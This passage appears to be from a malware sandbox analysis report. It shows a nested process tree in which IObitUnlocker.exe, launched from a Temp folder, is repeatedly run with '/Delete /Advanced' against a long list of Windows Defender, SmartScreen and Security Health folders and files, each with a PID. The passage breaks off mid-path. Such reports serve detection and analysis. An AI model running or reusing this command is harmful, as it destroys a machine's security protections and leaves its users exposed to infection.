                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:12268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 